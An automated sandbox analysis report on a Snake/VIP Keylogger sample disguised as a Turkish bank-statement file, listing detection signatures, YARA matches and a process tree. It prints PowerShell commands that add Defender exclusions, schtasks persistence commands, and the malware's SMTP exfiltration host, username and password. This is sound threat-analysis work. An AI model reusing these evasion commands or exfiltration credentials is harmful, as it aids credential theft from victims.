Edit tour

Windows Analysis Report
Hesap_Hareketleri_10122024_html.exe

Overview

General Information

Sample name:	Hesap_Hareketleri_10122024_html.exe
Analysis ID:	1572372
MD5:	18709f2606d2834d725a5677bdd4d737
SHA1:	bbc16514aea1e283ba1863a5db34c71b0f574fc8
SHA256:	50087b010b52ec07a7f52a85b56dc43041aae17b428e6b0af3d52d797d427682
Tags:	exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Hesap_Hareketleri_10122024_html.exe (PID: 2212 cmdline: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe" MD5: 18709F2606D2834D725A5677BDD4D737)

powershell.exe (PID: 1172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7320 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 2292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Hesap_Hareketleri_10122024_html.exe (PID: 7176 cmdline: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe" MD5: 18709F2606D2834D725A5677BDD4D737)

Hesap_Hareketleri_10122024_html.exe (PID: 7200 cmdline: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe" MD5: 18709F2606D2834D725A5677BDD4D737)

UDYiGmDlq.exe (PID: 7312 cmdline: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe MD5: 18709F2606D2834D725A5677BDD4D737)

schtasks.exe (PID: 7572 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

UDYiGmDlq.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe" MD5: 18709F2606D2834D725A5677BDD4D737)

UDYiGmDlq.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe" MD5: 18709F2606D2834D725A5677BDD4D737)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.4710756454.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.4714892909.00000000033CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e838:$a1: get_encryptedPassword 0x71858:$a1: get_encryptedPassword 0xb4678:$a1: get_encryptedPassword 0x2edc0:$a2: get_encryptedUsername 0x71de0:$a2: get_encryptedUsername 0xb4c00:$a2: get_encryptedUsername 0x2e4ab:$a3: get_timePasswordChanged 0x714cb:$a3: get_timePasswordChanged 0xb42eb:$a3: get_timePasswordChanged 0x2e5c2:$a4: get_passwordField 0x715e2:$a4: get_passwordField 0xb4402:$a4: get_passwordField 0x2e84e:$a5: set_encryptedPassword 0x7186e:$a5: set_encryptedPassword 0xb468e:$a5: set_encryptedPassword 0x3156a:$a6: get_passwords 0x7458a:$a6: get_passwords 0xb73aa:$a6: get_passwords 0x318fe:$a7: get_logins 0x7491e:$a7: get_logins 0xb773e:$a7: get_logins
0000000A.00000002.4714585363.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e520:$a1: get_encryptedPassword 0x71540:$a1: get_encryptedPassword 0xb4360:$a1: get_encryptedPassword 0x2eaa8:$a2: get_encryptedUsername 0x71ac8:$a2: get_encryptedUsername 0xb48e8:$a2: get_encryptedUsername 0x2e193:$a3: get_timePasswordChanged 0x711b3:$a3: get_timePasswordChanged 0xb3fd3:$a3: get_timePasswordChanged 0x2e2aa:$a4: get_passwordField 0x712ca:$a4: get_passwordField 0xb40ea:$a4: get_passwordField 0x2e536:$a5: set_encryptedPassword 0x71556:$a5: set_encryptedPassword 0xb4376:$a5: set_encryptedPassword 0x31252:$a6: get_passwords 0x74272:$a6: get_passwords 0xb7092:$a6: get_passwords 0x315e6:$a7: get_logins 0x74606:$a7: get_logins 0xb7426:$a7: get_logins
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x48181:$a1: get_encryptedPassword 0x486ff:$a2: get_encryptedUsername 0x47e03:$a3: get_timePasswordChanged 0x47f1a:$a4: get_passwordField 0x48197:$a5: set_encryptedPassword 0x4ae5b:$a6: get_passwords 0x4b1eb:$a7: get_logins 0x4ae47:$a8: GetOutlookPasswords 0x4a800:$a9: StartKeylogger 0x4b144:$a10: KeyLoggerEventArgs 0x4a8a0:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 7200	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 7200	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7312	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7312	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7312	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7312	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5117c:$a1: get_encryptedPassword 0x516fa:$a2: get_encryptedUsername 0x50dfe:$a3: get_timePasswordChanged 0x50f15:$a4: get_passwordField 0x51192:$a5: set_encryptedPassword 0x53e56:$a6: get_passwords 0x541e6:$a7: get_logins 0x53e42:$a8: GetOutlookPasswords 0x537fb:$a9: StartKeylogger 0x5413f:$a10: KeyLoggerEventArgs 0x5389b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: UDYiGmDlq.exe PID: 7644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7644	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: UDYiGmDlq.exe PID: 7644	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
11.2.UDYiGmDlq.exe.3a1a880.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
16.2.UDYiGmDlq.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.UDYiGmDlq.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.UDYiGmDlq.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
